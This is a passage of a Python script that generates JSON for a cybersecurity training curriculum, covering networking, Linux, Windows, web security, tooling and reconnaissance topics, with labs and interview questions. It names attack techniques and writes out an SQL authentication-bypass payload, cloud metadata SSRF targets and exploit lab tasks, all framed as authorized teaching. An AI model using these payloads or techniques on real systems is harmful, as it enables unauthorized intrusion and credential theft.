"""
Generator for the complete 40-Week / 200-Day Curriculum JSON.
Covers all 9 Phases, 40 Weeks, and 200 Days with precise curriculum topics,
lab scenarios, interview questions, and tools.
"""

import json
from pathlib import Path

phases = [
    # PHASE 1 (Weeks 1-6, Days 1-30)
    {
        "phase_num": 1,
        "phase_id": "phase-01-foundations",
        "phase_title": "Core Foundations — Networking + Linux + Windows + Web",
        "weeks_range": "Weeks 1–6",
        "days_range": "Days 001–030",
        "objective": "Build unshakeable foundational mastery across computer networking, operating system internals (Linux & Windows), Web protocols, and fundamental security tooling.",
        "skills": ["TCP/IP & OSI model", "Packet analysis with Wireshark/tcpdump", "Linux administration & permissions", "Windows internals & PowerShell", "Web architecture & identity protocols", "Security tooling & lab virtualization"],
        "tools": ["Wireshark", "tcpdump", "Bash", "PowerShell", "Sysmon", "Nmap", "Burp Suite", "Python 3"],
        "project_id": "project-01-security-lab-environment",
        "project_title": "Multi-OS Security Lab Environment (Kali + Windows VM + Linux Target + Web Lab + GitHub)",
        "weeks": [
            {
                "week_num": 1,
                "week_id": "week-01-networking",
                "week_title": "Networking & Protocols",
                "objective": "Master packet anatomy, subnetting, layer 2/3/4 protocols, and network traffic reconstruction.",
                "tools": ["Wireshark", "tcpdump", "ip", "ss", "dig", "traceroute", "scapy"],
                "major_concepts": ["OSI vs TCP/IP Layers", "3-Way Handshake", "CIDR Subnet Math", "ARP & ICMP Mechanics", "DNS Hierarchy", "TLS 1.3 Cryptography", "Berkeley Packet Filters (BPF)"],
                "weekly_lab": "Live Packet Inspection Lab: Capture 3-way handshake, analyze ARP spoofing artifacts, and reconstruct TCP conversation streams.",
                "deliverable": "Network Traffic Analysis Portfolio (PCAP captures, filter cheatsheet, and Wireshark stream reconstructions)",
                "days": [
                    {"day_num": 1, "title": "TCP/IP Architecture, OSI Model & The 3-Way Handshake", "topics": ["TCP/IP vs OSI model comparison", "IPv4/IPv6 packet headers", "TCP 3-way handshake (SYN, SYN-ACK, ACK)", "TCP flags (FIN, RST, PSH, URG)", "Stateful vs stateless protocols"], "objectives": "Understand TCP connection lifecycles, protocol boundaries, and state transitions at the byte level.", "lab": "Capture a live TCP 3-way handshake and connection teardown in Wireshark; verify sequence/acknowledgment numbers.", "interview_q": "Explain the difference between TCP SYN and RST flags, and how an attacker abuses SYN packets for stealth scanning."},
                    {"day_num": 2, "title": "IPv4, IPv6, CIDR Subnetting & Packet Fragmentation", "topics": ["IPv4 addressing classes and RFC 1918 private scopes", "CIDR notation and bitwise subnet calculations", "IPv6 address format, link-local vs global unicast", "IP fragmentation, MTU, and offset calculations", "Defensive implications of fragmented packets"], "objectives": "Perform mental and scripted subnetting, calculate broadcast/network addresses, and diagnose fragmentation attacks.", "lab": "Subnet a /22 network into four equal functional subnets for DMZ, Internal, Database, and Management tiers.", "interview_q": "How does an MTU mismatch cause silent connection drops, and how can an adversary leverage fragmentation to evade IDS/IPS inspection?"},
                    {"day_num": 3, "title": "Core Protocols — ARP, ICMP, DHCP, NAT & Routing Mechanics", "topics": ["Address Resolution Protocol (ARP) mechanics and ARP cache poisoning", "ICMP message types (Echo, Destination Unreachable, TTL Exceeded)", "DHCP DORA process and DHCP starvation", "Network Address Translation (SNAT, DNAT, PAT)", "Static routing vs Dynamic routing (OSPF, BGP basics)"], "objectives": "Map out how hosts discover gateways, resolve physical addresses, and how Layer 2 spoofing works.", "lab": "Use scapy / arping in Linux to inspect ARP tables and trace ICMP TTL behavior using traceroute.", "interview_q": "Explain how ARP poisoning allows an attacker to achieve a Man-in-the-Middle position and how Dynamic ARP Inspection (DAI) prevents it."},
                    {"day_num": 4, "title": "Transport & Application Layers — DNS, HTTP/HTTPS & TLS Cryptography", "topics": ["TCP vs UDP performance and reliability trade-offs", "DNS hierarchy, query types (A, AAAA, MX, TXT, NS), and recursive vs iterative resolution", "HTTP request/response lifecycle, status codes, and HTTP/1.1 vs HTTP/2", "TLS 1.2 vs TLS 1.3 handshake mechanics", "Public Key Infrastructure (PKI), digital certificates, and Cipher Suites"], "objectives": "Trace DNS resolution end-to-end and inspect encrypted TLS handshakes including Server Hello and Certificate exchange.", "lab": "Use dig and openssl s_client to examine DNS records, zone transfer attempts, and TLS certificate chains for a test domain.", "interview_q": "Walk through the TLS 1.3 handshake step-by-step and explain how Forward Secrecy protects past sessions if the server private key is leaked."},
                    {"day_num": 5, "title": "Network Traffic Analysis — tcpdump & Wireshark Stream Reconstruction", "topics": ["tcpdump CLI capture filters vs display filters", "Berkeley Packet Filters (BPF) syntax", "Wireshark GUI navigation, coloring rules, and conversation statistics", "Follow TCP/UDP Stream analysis", "Detecting anomalous network patterns (port scans, cleartext credentials)"], "objectives": "Capture raw traffic on headless interfaces and extract files, credentials, and conversation streams from PCAPs.", "lab": "Record network traffic with tcpdump -i any -w capture.pcap, filter out specific subnets, and extract cleartext HTTP credentials in Wireshark.", "interview_q": "Write a BPF expression to capture only inbound TCP SYN packets destined for port 80 or 443 originating from an external subnet."}
                ]
            },
            {
                "week_num": 2,
                "week_id": "week-02-linux",
                "week_title": "Linux Fundamentals & System Administration",
                "objective": "Master Linux filesystem hierarchy, permission models, systemd services, process namespaces, and host investigation.",
                "tools": ["Bash", "systemctl", "cron", "find", "lsof", "auditd", "journalctl", "awk"],
                "major_concepts": ["FHS Standard", "Discretionary Access Control (DAC)", "SUID/SGID Mechanics", "Process Tree & PID 1", "Systemd Units", "/proc Pseudo-filesystem", "Linux Log Architecture"],
                "weekly_lab": "Host Auditing Lab: Deploy custom systemd daemon, write automated cron health check, and inspect process environment via /proc.",
                "deliverable": "Linux Security Baseline Script & Host Audit Report",
                "days": [
                    {"day_num": 6, "title": "Linux Filesystem Hierarchy (FHS), Users & Standard Permissions", "topics": ["Filesystem Hierarchy Standard (/bin, /sbin, /etc, /var, /tmp, /opt)", "User & Group database files (/etc/passwd, /etc/shadow, /etc/group)", "Standard permissions (Read, Write, Execute for User, Group, Others)", "Octal vs symbolic chmod notation", "File ownership management with chown and chgrp"], "objectives": "Navigate Linux systems with confidence and identify improperly assigned read/write permissions on critical system assets.", "lab": "Audit permissions across /etc and /var, create custom users with restricted group memberships, and verify permission enforcement.", "interview_q": "Explain the significance of the fields in /etc/shadow, specifically hash algorithms, salt, and password expiration fields."},
                    {"day_num": 7, "title": "Special Permissions (SUID, SGID, Sticky Bit) & Process Execution", "topics": ["Set User ID (SUID) mechanics (octal 4000) and security implications", "Set Group ID (SGID) on directories and executables (octal 2000)", "Sticky Bit on shared directories (/tmp) (octal 1000)", "Process execution context: Real UID vs Effective UID", "Auditing the system for non-standard SUID binaries"], "objectives": "Discover all SUID/SGID binaries on a Linux host and understand how privilege transitions occur during binary execution.", "lab": "Use find / -perm -4000 2>/dev/null to locate SUID binaries, examine their permissions, and build a test C program demonstrating SUID privilege escalation.", "interview_q": "Why does a shell script with the SUID bit set fail to grant elevated privileges on modern Linux kernels, while a compiled C binary succeeds?"},
                    {"day_num": 8, "title": "Systemd Services, Daemons, Cron Tasks & SSH Key Hardening", "topics": ["Systemd unit files (.service, .timer, .target) and systemctl management", "Creating and securing custom systemd services", "Cron daemon architecture (/etc/crontab, /etc/cron.*, /var/spool/cron)", "SSH architecture, sshd_config hardening (disabling root login, password auth)", "Ed25519 vs RSA SSH key generation and authorized_keys file security"], "objectives": "Configure persistent daemons, schedule automated tasks securely, and establish cryptographic SSH access.", "lab": "Deploy a custom systemd service running a monitoring script under a low-privilege user; configure an automated cron backup and harden sshd.", "interview_q": "How does an attacker exploit a cron job running as root that executes a script in a world-writable directory?"},
                    {"day_num": 9, "title": "Virtual Filesystems (/proc, /sys), Environment Variables & Bash Automation", "topics": ["The /proc pseudo-filesystem: /proc/<PID>/cmdline, environ, fd, maps", "The /sys filesystem and kernel subsystem interaction", "Environment variables (PATH, LD_PRELOAD, LD_LIBRARY_PATH, SHELL)", "Bash scripting essentials: arguments, loops, pipes, conditional tests, exit codes", "Automating administrative and security tasks with shell scripts"], "objectives": "Query process memory and environment directly from /proc and write robust Bash scripts for system triage.", "lab": "Inspect the environment variables and open file descriptors of running processes via /proc; write a Bash script that alerts on new listening ports.", "interview_q": "What security information can be extracted from /proc/<PID>/environ, and why should sensitive credentials never be passed via command-line arguments?"},
                    {"day_num": 10, "title": "Linux Logging (/var/log, journalctl), Networking & Host Investigation", "topics": ["Log architecture: /var/log/auth.log, syslog, dmesg, wtmp, btmp", "Querying systemd journal with journalctl (time filters, unit filters, priority)", "Linux networking CLI: ip, ss, netstat, iptables, nftables", "Live host investigation triage methodology", "Identifying unauthorized users, listening sockets, and active connections"], "objectives": "Extract security events from system logs and identify unauthorized processes or suspicious outbound network sockets.", "lab": "Simulate failed SSH brute-force attempts and parse /var/log/auth.log and journalctl -u ssh using awk and grep to generate an IP blocklist.", "interview_q": "Which log file records successful and failed login attempts in Linux, and how would you detect a user attempting to tamper with log history?"}
                ]
            },
            {
                "week_num": 3,
                "week_id": "week-03-windows",
                "week_title": "Windows Internals & PowerShell Security",
                "objective": "Understand Windows security architecture, processes, tokens, registry, ACLs, and administrative management via PowerShell.",
                "tools": ["PowerShell", "Process Explorer", "Process Hacker", "Sysmon", "sc.exe", "icacls", "Event Viewer"],
                "major_concepts": ["User vs Kernel Mode", "LSASS & SAM Architecture", "Access Tokens & Privileges", "DACLs vs SACLs", "Service Control Manager", "PowerShell Script Block Logging", "Sysmon Telemetry"],
                "weekly_lab": "Windows Telemetry Lab: Install Sysmon with SwiftOnSecurity config, generate suspicious executions, and analyze generated event logs.",
                "deliverable": "Windows Host Auditing & Telemetry Baseline (Sysmon config + PowerShell triage script)",
                "days": [
                    {"day_num": 11, "title": "Windows OS Architecture — User Mode, Kernel Mode & PE Basics", "topics": ["Ring 3 (User Mode) vs Ring 0 (Kernel Mode) separation", "Executive subsystems: ntdll.dll, win32k.sys, HAL", "Process architecture: Process ID, PEB, TEB", "Threads, virtual memory allocation, and page protection flags", "Introduction to Portable Executable (PE) headers (MZ, PE signature, sections)"], "objectives": "Understand how the Windows kernel isolates process memory and enforces execution boundaries.", "lab": "Use Process Explorer / Process Hacker to inspect process trees, thread call stacks, and loaded DLL modules.", "interview_q": "Explain the architectural boundary between User Mode and Kernel Mode in Windows. What happens when a user program makes a syscall?"},
                    {"day_num": 12, "title": "Windows Security Subsystem — LSASS, SAM, Tokens & ACLs", "topics": ["Local Security Authority Subsystem Service (LSASS) role and memory space", "Security Account Manager (SAM) database and system hives", "Windows Access Tokens: Primary vs Impersonation tokens, Token Privileges", "Security Identifiers (SIDs): Administrator, SYSTEM, Everyone", "Discretionary ACLs (DACLs) vs System ACLs (SACLs) and Access Control Entries (ACEs)"], "objectives": "Examine token privileges (e.g. SeDebugPrivilege) and evaluate security descriptors on files and registry keys.", "lab": "Use whoami /priv and icacls to inspect user tokens and file permissions; audit inheritance rules on sensitive directory trees.", "interview_q": "What is the difference between a DACL and a SACL in Windows security descriptors, and what is the role of an ACE?"},
                    {"day_num": 13, "title": "Windows Services, Registry Architecture, Scheduled Tasks & UAC", "topics": ["Windows Service Control Manager (SCM), service accounts (LocalSystem, NetworkService)", "Windows Registry structure (HKLM, HKCU, HKCR)", "Common persistence autostart keys (Run, RunOnce, Winlogon)", "Task Scheduler mechanics, XML definition files, and triggers", "User Account Control (UAC) architecture, integrity levels (Low, Medium, High, System)"], "objectives": "Query and inspect service binary paths, scheduled task configurations, and registry values.", "lab": "Create and inspect a Windows service via sc.exe, analyze its registry definition in HKLM\\System\\CurrentControlSet\\Services, and configure a scheduled task.", "interview_q": "How does User Account Control (UAC) prevent standard administrative processes from performing privileged kernel modifications without consent?"},
                    {"day_num": 14, "title": "PowerShell for Security Operations — WMI, CIM & WinRM", "topics": ["PowerShell execution policies, Cmdlet architecture, and object pipeline", "Windows Management Instrumentation (WMI) and Common Information Model (CIM)", "Querying system hardware, operating system, and processes via WMI/CIM", "Windows Remote Management (WinRM) and PowerShell Remoting (Enter-PSSession)", "PowerShell security features: Script Block Logging (EID 4104), Transcription, AMSI overview"], "objectives": "Automate security telemetry gathering and remote system queries using native PowerShell cmdlets and WMI.", "lab": "Write PowerShell scripts using Get-CimInstance to enumerate running services, listening ports, and startup programs across local and remote instances.", "interview_q": "What information does PowerShell Script Block Logging (Event ID 4104) capture, and how does it assist SOC analysts during forensic investigations?"},
                    {"day_num": 15, "title": "Windows Auditing — Security Event Logs, Sysmon & Endpoint Visibility", "topics": ["Windows Event Log architecture (.evtx format, System, Security, Application channels)", "Critical Security Event IDs: 4624 (Logon), 4625 (Failed Logon), 4688 (Process Creation), 4672 (Admin Logon)", "Enabling Advanced Audit Policies (Command Line Auditing)", "System Monitor (Sysmon) architecture, configuration schema, and filtering", "Key Sysmon Event IDs: EID 1 (Process Create), EID 3 (Network Connect), EID 10 (Process Access)"], "objectives": "Install and configure Sysmon with an industry-standard configuration (SwiftOnSecurity) and analyze security telemetry in Event Viewer.", "lab": "Deploy Sysmon in a Windows lab, generate deliberate test activities (spawning cmd from powershell, network beacons), and trace the resulting Sysmon events.", "interview_q": "Why is Windows Event ID 4688 insufficient on its own for deep threat detection without enabling command-line argument auditing, and how does Sysmon EID 1 complement it?"}
                ]
            },
            {
                "week_num": 4,
                "week_id": "week-04-web-architecture",
                "week_title": "Web Architecture & Core Protocols",
                "objective": "Master HTTP request/response mechanics, browser security policies, session handling, OAuth/OIDC, and modern web infrastructure.",
                "tools": ["Burp Suite", "curl", "Postman", "Nginx", "Python HTTP Server", "Browser DevTools"],
                "major_concepts": ["HTTP Methods & Headers", "Cookie Security Flags", "Same-Origin Policy", "CORS Preflight", "JWT Signing (HS256 vs RS256)", "OAuth 2.0 Auth Code Grant", "Reverse Proxy Architecture"],
                "weekly_lab": "Web Protocol Inspection Lab: Configure Nginx reverse proxy with SSL termination and examine CORS preflight requests in Burp Suite.",
                "deliverable": "Web Security Header & Architecture Audit Matrix",
                "days": [
                    {"day_num": 16, "title": "HTTP Protocol Deep Dive, Headers, Cookies & Sessions", "topics": ["HTTP verbs (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)", "Request and Response headers (Host, User-Agent, Referer, Accept, Content-Type)", "Cookie security flags: HttpOnly, Secure, SameSite (Strict, Lax, None)", "Session lifecycle: creation, storage, expiration, and invalidation", "Session fixation and session hijacking principles"], "objectives": "Analyze raw HTTP request/response streams and audit cookie configurations for security compliance.", "lab": "Build a minimal HTTP server in Python, observe cookie issuance, and demonstrate session hijacking by stealing unflagged cookies.", "interview_q": "What protection does the HttpOnly flag provide against XSS attacks, and does it prevent an attacker from executing actions on the victim's behalf?"},
                    {"day_num": 17, "title": "Browser Security Model — Same-Origin Policy (SOP), CORS & CSP", "topics": ["Same-Origin Policy definition: Protocol, Host, Port matching rules", "DOM access vs Network request cross-origin restrictions", "Cross-Origin Resource Sharing (CORS) architecture: Preflight OPTIONS, Access-Control-Allow-Origin, Credentials", "CORS misconfigurations: Wildcard with credentials, Origin reflection, null origin trust", "Content Security Policy (CSP): Directives (script-src, default-src), nonces, and hashes"], "objectives": "Evaluate browser origin boundaries, identify exploitable CORS configurations, and audit CSP headers.", "lab": "Set up two local web origins and demonstrate how SOP blocks cross-origin reads; configure a vulnerable CORS policy and exploit it to extract data.", "interview_q": "Why does an Access-Control-Allow-Origin: * header not permit cross-origin requests containing credentials (Access-Control-Allow-Credentials: true) in modern browsers?"},
                    {"day_num": 18, "title": "Authentication Architectures — Passwords, Sessions & JSON Web Tokens (JWT)", "topics": ["Password hashing algorithms: MD5/SHA vs bcrypt, Argon2, PBKDF2 (work factor, salt)", "Session-based stateful authentication vs Token-based stateless authentication", "JWT structure: Header (Base64Url), Payload (Claims), Signature", "Standard JWT claims (iss, sub, aud, exp, nbf, iat)", "Cryptographic verification of symmetric (HS256) vs asymmetric (RS256) signatures"], "objectives": "Decode and cryptographically verify JWTs and contrast stateful session stores with stateless bearer tokens.", "lab": "Implement a Python script to decode, verify, and forge unsigned JWTs; test token tamper detection with HMAC verification.", "interview_q": "Explain the trade-offs between stateful session IDs and stateless JWT tokens, specifically regarding immediate session revocation and token size."},
                    {"day_num": 19, "title": "Modern Federated Identity — OAuth 2.0 & OpenID Connect (OIDC)", "topics": ["OAuth 2.0 roles: Resource Owner, Client, Authorization Server, Resource Server", "Authorization Code Grant Flow step-by-step (with PKCE for public clients)", "Access Tokens vs Refresh Tokens vs ID Tokens", "OpenID Connect (OIDC) identity layer on top of OAuth 2.0", "Common OAuth vulnerabilities: Redirect URI poisoning, CSRF on auth flow, token leakage"], "objectives": "Map out the OAuth 2.0 Authorization Code flow and identify failure points where authorization codes can be intercepted.", "lab": "Trace an OAuth 2.0 authentication flow with Burp Suite, identify state parameter validation, and inspect the issued JWT ID token.", "interview_q": "What is the purpose of the state parameter in OAuth 2.0, and what attack is possible if an application omits it?"},
                    {"day_num": 20, "title": "Web Infrastructure — Reverse Proxies, CDNs, WebSockets & APIs", "topics": ["Reverse proxies (Nginx, HAProxy) role in SSL termination, caching, and routing", "Content Delivery Networks (CDNs) and web application caching behavior", "WebSockets protocol: HTTP Upgrade handshake, bi-directional full-duplex communication", "RESTful API conventions vs RPC architectures", "Header forwarding: X-Forwarded-For, X-Forwarded-Host, X-Real-IP security implications"], "objectives": "Understand how perimeter reverse proxies translate and forward client requests to internal upstream servers.", "lab": "Configure an Nginx reverse proxy forwarding to a backend web app; inspect header manipulation and simulate IP spoofing via X-Forwarded-For.", "interview_q": "How can trusting client-supplied headers like X-Forwarded-For without proxy validation lead to authentication bypass or IP restriction evasion?"}
                ]
            },
            {
                "week_num": 5,
                "week_id": "week-05-web-security",
                "week_title": "Web Security Fundamentals",
                "objective": "Understand foundational web vulnerabilities from an attack and defense perspective, including injection and client-side flaws.",
                "tools": ["Burp Suite", "OWASP Juice Shop / DVWA", "sqlmap basics", "Browser Console", "Python requests"],
                "major_concepts": ["API Security Surface", "XSS Mechanics (Reflected/Stored/DOM)", "CSRF Tokens vs SameSite", "SSRF to Cloud Metadata", "SQL Injection Mechanics", "Prepared Statements"],
                "weekly_lab": "Vulnerability Analysis Lab: Deploy DVWA / Juice Shop, execute manual XSS and SQLi exploits, and implement developer code remediations.",
                "deliverable": "Web Vulnerability Root-Cause & Remediation Notebook",
                "days": [
                    {"day_num": 21, "title": "API Architectures, RESTful Conventions & GraphQL Introspection", "topics": ["API request methods, JSON payloads, and status code standards", "API attack surfaces: Documentation endpoints (/swagger, /api-docs), hidden routes", "GraphQL core concepts: Schemas, Queries, Mutations, Resolvers", "GraphQL Introspection query mechanics", "API rate limiting, authentication headers (Bearer, API-Key)"], "objectives": "Enumerate REST and GraphQL APIs, query schema introspection, and map hidden endpoints.", "lab": "Send a standard GraphQL introspection query to extract the complete schema, types, and hidden mutations from a test application.", "interview_q": "Why should GraphQL introspection be disabled in production environments, and what security risks does an exposed schema introduce?"},
                    {"day_num": 22, "title": "Cross-Site Scripting (XSS) Core Mechanics — Stored, Reflected & DOM", "topics": ["XSS definition and execution context in the browser", "Reflected XSS: Parameter reflection without encoding", "Stored XSS: Database persistence and payload delivery to multiple users", "DOM-based XSS: Sources and Sinks (innerHTML, eval, document.write)", "Defenses: Context-aware output encoding, input validation, CSP"], "objectives": "Distinguish between server-reflected, persistent, and client-side DOM XSS vulnerabilities with safe demonstration payloads.", "lab": "Deploy a vulnerable lab web page, trigger Reflected and DOM XSS using benign alert/log payloads, and implement output encoding fixes.", "interview_q": "Why is HTML entity encoding insufficient when injecting user input directly inside a JavaScript <script> block, and what encoding is required?"},
                    {"day_num": 23, "title": "Cross-Site Request Forgery (CSRF) & SameSite Cookie Defenses", "topics": ["CSRF attack mechanics: Exploiting ambient browser credentials", "State-changing GET requests vs vulnerable POST endpoints", "Anti-CSRF Tokens: Synchronizer token pattern, Double Submit Cookie pattern", "SameSite cookie attribute behavior: Strict, Lax, None", "Preflight CORS requests as CSRF mitigation"], "objectives": "Construct CSRF proof-of-concept HTML exploit forms and implement anti-CSRF token verification.", "lab": "Build an HTML page that automatically submits a form to change a password on a vulnerable mock banking site; verify SameSite cookie defenses.", "interview_q": "Explain how the SameSite=Lax cookie attribute mitigates CSRF attacks while still permitting user-friendly cross-site link clicks."},
                    {"day_num": 24, "title": "Server-Side Request Forgery (SSRF) Mechanics & Cloud Metadata", "topics": ["Server-Side Request Forgery (SSRF) concept: Coercing servers into sending outbound requests", "Internal network scanning via SSRF (accessing localhost, 127.0.0.1, internal subnets)", "Cloud Instance Metadata Service (IMDS) targeting: AWS 169.254.169.254, GCP, Azure", "IMDSv1 vs IMDSv2 (Session token requirement via PUT header)", "Defenses: Whitelisting, blocking private IP ranges (RFC 1918), disabling unused URL schemes"], "objectives": "Understand how attackers pivot through vulnerable backend web services to query internal infrastructure and cloud credentials.", "lab": "Simulate an SSRF vulnerability that fetches remote profile images; demonstrate internal port discovery on localhost (127.0.0.1).", "interview_q": "How does AWS IMDSv2 prevent SSRF attacks from stealing IAM role credentials compared to IMDSv1?"},
                    {"day_num": 25, "title": "SQL Injection Fundamentals — Error-based, Union-based & Blind", "topics": ["SQL query construction and the flaw of string concatenation", "Authentication bypass payloads (' OR 1=1 --)", "UNION-based SQLi: Column count determination and data type matching", "Error-based SQLi: Extracting data through database engine error messages", "Blind SQLi concepts: Boolean-based true/false response differences and time delays", "Defenses: Parameterized queries (Prepared Statements), ORMs"], "objectives": "Explain why SQL injection occurs and construct safe UNION and Blind SQLi payloads against an authorized database lab.", "lab": "Set up a SQLite / MySQL vulnerable endpoint, use UNION-based injection to extract table schemas, and rewrite the query using parameterized statements.", "interview_q": "Explain why parameterized queries (prepared statements) completely eliminate SQL injection regardless of user input characters."}
                ]
            },
            {
                "week_num": 6,
                "week_id": "week-06-tooling",
                "week_title": "Security Tooling Foundation",
                "objective": "Build operational proficiency with essential security toolchains, intercepting proxies, scanning engines, and scripting for automation.",
                "tools": ["Kali Linux", "Nmap", "Burp Suite Community", "Git", "Python 3", "VirtualBox / VMware", "Docker"],
                "major_concepts": ["Kali Environment OPSEC", "TCP SYN vs Connect Scans", "NSE Scripting Engine", "Burp Repeater & Intruder", "Python Network Automation", "Virtual Lab Isolation"],
                "weekly_lab": "Deliverable 1 Lab: Provision Kali Linux, target Linux, target Windows, and vulnerable container web apps on an isolated private virtual network.",
                "deliverable": "Deliverable 1: Security Lab Environment (Kali + Windows Target + Linux Target + Web Lab + GitHub Documentation)",
                "days": [
                    {"day_num": 26, "title": "Security Workstation Setup — Kali Linux, Shell Customization & Git OPSEC", "topics": ["Kali Linux / Parrot OS architecture and package management", "Terminal productivity: Zsh/Bash aliases, tmux multiplexing, curl/jq workflows", "Git version control for security practitioners: branching, tagging, commit discipline", "Git OPSEC: Avoiding committing private keys, API tokens, and sensitive client scopes (.gitignore)", "Setting up isolated virtual environments in Python (venv)"], "objectives": "Establish a reproducible, clean, and OPSEC-safe security testing workstation and workflow.", "lab": "Configure a dedicated security workspace with git pre-commit hooks that scan for accidental secret commits (TruffleHog / detect-secrets).", "interview_q": "What security risks arise when security practitioners store engagement notes or scripts in public GitHub repositories, and how do you prevent credential leaks?"},
                    {"day_num": 27, "title": "Network Scanning & Port Enumeration with Nmap", "topics": ["TCP SYN scan (-sS) vs TCP Connect scan (-sT) mechanics", "UDP scanning (-sU) challenges and ICMP port unreachable replies", "Service version detection (-sV) and OS fingerprinting (-O)", "Nmap Scripting Engine (NSE): Categories (vuln, safe, default, discovery)", "Timing templates (-T0 through -T5) and network bandwidth impact"], "objectives": "Execute targeted, deliberate Nmap scans against lab targets and analyze raw TCP packets generated by different scan flags.", "lab": "Scan a local Linux target with -sS, -sT, and -sU; inspect the Wireshark packet capture to observe the half-open SYN vs full 3-way handshake.", "interview_q": "Why does a TCP SYN scan require raw socket / root privileges to execute, whereas a TCP Connect scan can run as an unprivileged user?"},
                    {"day_num": 28, "title": "Web Application Interception with Burp Suite", "topics": ["Configuring browser proxy settings and installing the Burp CA root certificate", "Burp Suite architecture: Proxy, Repeater, Intruder, Decoder, Comparer", "Crafting and replaying requests in Repeater", "Intruder attack types: Sniper, Battering Ram, Pitchfork, Cluster Bomb", "Match and Replace rules for automated header injection and session testing"], "objectives": "Intercept, analyze, modify, and replay HTTP/HTTPS traffic seamlessly using Burp Suite Community/Pro.", "lab": "Proxy browser traffic through Burp, intercept an authentication request, replay it in Repeater with modified headers, and test a wordlist in Intruder.", "interview_q": "How does Burp Suite intercept HTTPS traffic without causing browser SSL warnings, and what are the security implications of trusting a custom CA certificate?"},
                    {"day_num": 29, "title": "Python for Security Practitioners — Sockets, Requests & Automation", "topics": ["Python socket module: Creating TCP clients, binding servers, handling timeouts", "Python requests library: Session management, custom headers, handling cookies, SSL verification", "Command-line argument parsing with argparse", "JSON parsing and structured log output", "Building lightweight network and web security automation utilities"], "objectives": "Write functional, well-structured Python scripts to interact directly with network services and REST APIs.", "lab": "Write a multi-threaded TCP port checker in Python that scans a user-defined subnet and exports open ports to a structured JSON file.", "interview_q": "When writing security automation in Python, why should verify=False in requests.get() be strictly avoided in production tools, and what are the risks?"},
                    {"day_num": 30, "title": "Phase 1 Capstone Deliverable — Security Lab Environment", "topics": ["Virtualization architecture: Hyper-V, VirtualBox, VMware Workstation", "Host-Only vs NAT vs Bridged virtual network adapters", "Deploying Kali Linux, Windows Evaluation Target, and Vulnerable Linux VM", "Configuring static IP ranges and verifying network isolation from home LAN", "Documenting architecture diagrams, asset inventory, and connectivity verification"], "objectives": "Finalize and document a complete, isolated multi-OS cybersecurity lab environment ready for offensive and defensive operations.", "lab": "Deploy and interconnect a Kali Linux attacker VM, a Windows 10/11 Target VM, and a Linux VM on an isolated Host-Only subnet; verify bidirectional ping and scanning.", "interview_q": "Explain why security testing must strictly occur within isolated host-only or dedicated lab subnets rather than directly over bridging on home or corporate networks."}
                ]
            }
        ]
    },

    # PHASE 2 (Weeks 7-12, Days 31-60)
    {
        "phase_num": 2,
        "phase_id": "phase-02-web-recon",
        "phase_title": "Web Application Security + Reconnaissance",
        "weeks_range": "Weeks 7–12",
        "days_range": "Days 031–060",
        "objective": "Master external attack surface mapping, reconnaissance automation, modern web exploitation across client and server layers, API auditing, and penetration testing reporting.",
        "skills": ["Passive & active OSINT", "Subdomain enumeration & takeover verification", "Content discovery & endpoint scraping", "Exploitation of OWASP Top 10 vulnerabilities", "API security auditing (REST/GraphQL/JWT)", "Professional vulnerability reporting with CVSS"],
        "tools": ["SpiderFoot", "reconftw", "Subzy", "crt.sh", "httprobe", "EyeWitness", "jsendpoints", "Nuclei", "Gobuster", "Feroxbuster", "Shodan", "TruffleHog", "Burp Suite", "sqlmap"],
        "project_id": "project-02-web-pentest-report",
        "project_title": "Web Security Lab & Professional Penetration Test Report (Executive Summary + Technical Exploits + Remediations)",
        "weeks": [
            {
                "week_num": 7,
                "week_id": "week-07-recon-osint",
                "week_title": "Passive & Active Reconnaissance",
                "objective": "Collect actionable intelligence on domains, infrastructure, subdomains, and cloud assets without alerting security controls.",
                "tools": ["whois", "dig", "crt.sh", "httprobe", "Sublist3r", "Amass", "Subzy", "AWSBucketDump", "CloudBrute", "TruffleHog", "Gitrob"],
                "major_concepts": ["OSINT Methodology", "Certificate Transparency Logs", "DNS Zone Walking & Brute Force", "Subdomain Takeover Fingerprints", "S3 Bucket Permissions", "GitHub Secret Leakage"],
                "weekly_lab": "Reconnaissance Pipeline Lab: Chain crt.sh -> httprobe -> EyeWitness to passively map and screenshot an authorized scope's subdomains.",
                "deliverable": "Passive Target Dossier & Subdomain Takeover Audit Sheet",
                "days": [
                    {"day_num": 31, "title": "Open Source Intelligence (OSINT) — Domain WHOIS, ASN Mapping & IP Scopes", "topics": ["WHOIS privacy, historical records, and registrant data", "Autonomous System Numbers (ASN) mapping and BGP routing prefixes", "Identifying organization IP ranges via ARIN, RIPE, and Hurricane Electric", "Reverse DNS lookups and PTR record scanning", "Mapping corporate subsidiaries and acquisitions"], "objectives": "Identify an organization's complete registered IP allocations and autonomous systems.", "lab": "Query ASN allocations and CIDR blocks for an authorized organization using whois, bgp.he.net, and automated lookup scripts.", "interview_q": "Why is ASN mapping critical when defining the scope of an external penetration test, and how does it prevent scanning out-of-scope third parties?"},
                    {"day_num": 32, "title": "Subdomain Enumeration — Passive (crt.sh, CT Logs) & Active Discovery", "topics": ["Certificate Transparency (CT) logs mechanics and crt.sh database querying", "Aggregating passive sources: AlienVault OTX, VirusTotal, SecurityTrails", "Active DNS brute-forcing with custom wordlists (SecLists)", "Resolvers validation: Massdns, puredns, and avoiding poisoned public resolvers", "Permutation scanning (altdns)"], "objectives": "Discover both known and hidden subdomains using passive certificate logs and rapid active DNS resolution.", "lab": "Build a bash pipeline combining curl to crt.sh with jq, sort, and httprobe to enumerate live HTTP services across subdomains.", "interview_q": "What is the difference between passive and active subdomain enumeration, and why do CT logs often reveal staging and internal test systems?"},
                    {"day_num": 33, "title": "DNS Enumeration & Subdomain Takeover Analysis", "topics": ["DNS record types: CNAME, TXT, A, MX, NS and zone transfers (AXFR)", "Subdomain takeover anatomy: Dangling CNAME records pointing to unclaimed services", "Cloud provider fingerprints (AWS S3, GitHub Pages, Heroku, Azure Traffic Manager)", "Automated takeover verification with Subzy and can-i-take-over-xyz", "Defensive mitigation: Orphaned DNS cleanup and domain verification"], "objectives": "Identify dangling DNS records pointing to decommissioned third-party cloud providers and verify takeover vulnerability safely.", "lab": "Scan a list of test subdomains using Subzy to detect unclaimed third-party services and verify DNS resolution against hosting provider responses.", "interview_q": "Explain the exact lifecycle of a subdomain takeover vulnerability involving an AWS S3 bucket or GitHub Pages CNAME record."},
